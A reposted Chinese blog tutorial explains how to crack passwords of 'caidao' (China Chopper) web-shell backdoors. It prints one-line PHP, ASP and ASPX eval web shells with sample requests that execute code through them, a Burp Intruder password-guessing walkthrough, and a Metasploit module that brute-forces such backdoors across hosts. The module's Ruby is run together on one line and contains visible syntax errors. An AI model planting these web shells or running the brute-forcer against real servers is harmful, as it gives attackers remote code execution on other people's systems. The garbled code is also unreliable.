Metasploit - crack chinese caidao php backdoor

本文主要是介绍Metasploit - crack chinese caidao php backdoor，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

Backdoor Request

PHP Backdoor:

    <?php @eval($_POST["OP"]);?>

HTTP Request:
    POST /bk.php
    ....
    op=phpinfo();

If it's successful, phpinfo page will show us.

ASP Backdoor:
    <%eval request("op")%>

HTTP Request:
    POST /bk.asp
    op=execute("response.write(""woo""):response.write(Len(""admin"")):response.write(""woo""):response.    end")

If it's successful, 'woo5woo' page will show us.

ASPX Backdoor:
    <%@ Page Language="Jscript"%><%eval(Request.Item["op"],"unsafe");%>

HTTP Request:
    POST /bk.aspx
    op=Response.Write("woo");Response.Write(1+4);Response.Write("woo")

If it's successful, 'woo5woo' page will show us.

Crack a php backdoor

For Example, we will crack caidao php backdoor step by step.

1. We create a html login form to learn how to use php backdoor.

Press the lable called "Click Here", we will see HTTP request in burpsuite.

send it to intruder, and make "adminadmin" as a intruder variable.

Bingo ! The password is 'adminadmin'. Now we can do it with metasploit as follow.

Crack backdoors with metasploit

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##require 'msf/core'class Metasploit3 < Msf::Auxiliaryinclude Msf::Exploit::Remote::HttpClientinclude Msf::Auxiliary::Scannerinclude Msf::Auxiliary::AuthBrutedef initialize(info = {})super(update_info(info,'Name'           => 'Chinese Caidao Backdoor Bruteforce','Description'    => 'This module attempts to brute chinese caidao php/asp/aspx backdoor.','Author'         => [ 'Nixawk' ],'References'     => [[ 'URL', 'http://blog.csdn.net/nixawk/article/details/40430329']],'License'        => MSF_LICENSE))register_options([OptEnum.new('TYPE', [ true, "backdoor type", "PHP", ["PHP", "ASP", "ASPX"] ]),OptBool.new('VERBOSE', [ false, 'Enable detailed status messages', false ])OptString.new('TARGETURI', [ true, "The URI to authenticate against", "/backdoor.php" ])], self.class)register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ])enddef backdoor_brute(uri, user, pass, payload, match)begindata = "&user=#{user}&#{pass}=#{payload}"res = send_request_cgi({'uri'          =>  uri,'method'       =>  "POST",'data'         =>  "#{data}"})rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEOUTprint_error("#{peer} - Service failed to respond")return :abortendprint_status("#{peer} - brute force caidao password: \"#{pass}\"")if res and res.code == 200 and res.body =~ /#{match}/miprint_good("#{peer} - Successful login: password - \"#{pass}\"")return :next_userendreturnenddef run_host(ip)uri = normalize_uri(target_uri.path)script_type = datastore['TYPE']junk = Rex::Text::rand_text_alphanumeric(4)match = "#{junk}4#{junk}"case script_typewhen /php$/mipayload = "$_=\"4\";echo \"#{junk}\".$_.\"#{junk}\";";when /asp$/mipayload = "execute(\"response.write(\"\"#{junk}\"\"):response.write(Len(\"\"#{junk}\"\")):response.write(\"\"#{junk}\"\"):response.end\")"when /aspx$/mipayload = "Response.Write(\"#{junk}\");Response.Write(Len(\"#{junk}\")});Response.Write(\"#{junk}\")"elseprint_error("#{peer} - Backddor type is not support")returnendeach_user_pass { |user, pass|backdoor_brute(uri, user, pass, payload, match)}end
end

这篇关于Metasploit - crack chinese caidao php backdoor的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！